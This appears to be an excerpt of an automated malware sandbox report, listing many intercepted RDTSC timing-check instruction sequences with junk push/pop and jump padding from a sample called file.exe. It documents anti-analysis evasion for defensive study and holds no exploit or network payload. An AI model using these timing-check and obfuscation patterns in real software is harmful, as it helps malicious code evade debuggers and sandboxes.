                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67D7F1 second address: 67D7F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67D7F8 second address: 67D7FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67D7FD second address: 67D820 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7704E143C2h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jnp 00007F7704E143B6h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67D820 second address: 67D831 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 je 00007F7704DD53AEh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 687249 second address: 687270 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F7704E143B6h 0x0000000a popad 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7704E143C9h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6857AF second address: 6857B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6857B3 second address: 6857BE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 686600 second address: 686613 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704DD53AFh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68694C second address: 686980 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F7704E143B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F7704E143C9h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jno 00007F7704E143B6h 0x0000001a jnl 00007F7704E143B6h 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 686980 second address: 68698A instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7704DD53A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68698A second address: 68698F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68698F second address: 686997 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 686997 second address: 6869A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 686C6B second address: 686CCD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F7704DD53B3h 0x0000000c jbe 00007F7704DD53A6h 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 push edx 0x00000017 jmp 00007F7704DD53AFh 0x0000001c pop edx 0x0000001d pushad 0x0000001e jmp 00007F7704DD53ABh 0x00000023 push edx 0x00000024 pop edx 0x00000025 popad 0x00000026 pushad 0x00000027 jmp 00007F7704DD53B4h 0x0000002c pushad 0x0000002d popad 0x0000002e pushad 0x0000002f popad 0x00000030 popad 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 686CCD second address: 686CE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7704E143C0h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68ECF9 second address: 68ECFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68F12D second address: 68F134 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68F41D second address: 68F43D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F7704DD53BAh 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68F43D second address: 68F441 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68F89A second address: 68F8B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7704DD53B8h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68F8B6 second address: 68F8BC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68F8BC second address: 68F8D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F7704DD53AFh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68F8D8 second address: 68F8F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F7704E143C4h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6966B4 second address: 6966D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F7704DD53A6h 0x00000009 jmp 00007F7704DD53B5h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 696BCF second address: 696BD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 696BD5 second address: 696BD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 696BD9 second address: 696BDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 697210 second address: 69721F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007F7704DD53A6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69721F second address: 697223 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 697360 second address: 697368 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69E8F0 second address: 69E8F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69E8F6 second address: 69E900 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69E900 second address: 69E904 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69EA34 second address: 69EA38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69EA38 second address: 69EA46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ecx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69EA46 second address: 69EA5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704DD53AFh 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69EA5F second address: 69EA63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A1334 second address: 6A133A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A133A second address: 6A1340 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A1340 second address: 6A134A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F7704DD53A6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A62A3 second address: 6A62C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 jmp 00007F7704E143C8h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A8560 second address: 6A8578 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704DD53B4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A8578 second address: 6A857E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B0FC6 second address: 6B0FCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B0FCA second address: 6B0FD2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B0FD2 second address: 6B0FE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7704DD53AAh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B2CB5 second address: 6B2CB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B2CB9 second address: 6B2CC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B2CC1 second address: 6B2CC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B2CC6 second address: 6B2CCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B5C05 second address: 6B5C0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B5C0B second address: 6B5C12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B5C12 second address: 6B5C18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B5684 second address: 6B5688 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B5688 second address: 6B569A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F7704E143BCh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BB5B0 second address: 6BB5B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BB5B6 second address: 6BB5C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F7704E143B6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C458B second address: 6C4593 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C4593 second address: 6C4597 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E3198 second address: 5E319E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E319E second address: 5E31AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 je 00007F7704E143B6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CB508 second address: 6CB50C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CB50C second address: 6CB515 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CBBED second address: 6CBBF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CBBF3 second address: 6CBC08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704E143BAh 0x00000007 pushad 0x00000008 jnl 00007F7704E143B6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CBC08 second address: 6CBC0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CBD2B second address: 6CBD43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7704E143C2h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CBD43 second address: 6CBD5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F7704DD53B0h 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CBD5E second address: 6CBD62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CBE84 second address: 6CBE96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F7704DD53ACh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D0918 second address: 6D092E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F7704E143C0h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D092E second address: 6D0938 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F7704DD53A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D0AA0 second address: 6D0AA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D0AA6 second address: 6D0AAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D0AAA second address: 6D0AB4 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7704E143B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DCA7C second address: 6DCA80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DF1AC second address: 6DF1B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E23F5 second address: 6E2417 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F7704DD53B2h 0x00000008 je 00007F7704DD53B2h 0x0000000e je 00007F7704DD53A6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E2417 second address: 6E243C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 jng 00007F7704E143B6h 0x0000000e pushad 0x0000000f popad 0x00000010 jl 00007F7704E143B6h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 je 00007F7704E143B6h 0x0000001f jnp 00007F7704E143B6h 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E243C second address: 6E2442 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E2442 second address: 6E245D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F7704E143C2h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E2270 second address: 6E2276 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E4733 second address: 6E4737 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E4737 second address: 6E473D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E473D second address: 6E4747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E4747 second address: 6E4755 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E4755 second address: 6E47A2 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7704E143B6h 0x00000008 jmp 00007F7704E143C3h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 pushad 0x00000011 jno 00007F7704E143BCh 0x00000017 jl 00007F7704E143CFh 0x0000001d jmp 00007F7704E143C3h 0x00000022 jc 00007F7704E143B6h 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F0B4C second address: 6F0B6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F7704DD53B1h 0x0000000c jne 00007F7704DD53A6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F0B6A second address: 6F0B6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F0B6E second address: 6F0B74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F0B74 second address: 6F0B81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F0B81 second address: 6F0B85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F0B85 second address: 6F0B9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704E143C3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F0B9C second address: 6F0BA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F99FE second address: 6F9A14 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F7704E143BCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F9A14 second address: 6F9A1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F9A1A second address: 6F9A36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F7704E143C2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F9A36 second address: 6F9A3E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA3E6 second address: 6FA3EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA6F2 second address: 6FA705 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jo 00007F7704DD53A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA705 second address: 6FA70B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA70B second address: 6FA710 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA888 second address: 6FA8A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F7704E143C5h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FF32F second address: 6FF356 instructions: 0x00000000 rdtsc 0x00000002 je 00007F7704DD53ACh 0x00000008 jne 00007F7704DD53A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 jnc 00007F7704DD53ACh 0x00000018 pushad 0x00000019 jo 00007F7704DD53A6h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
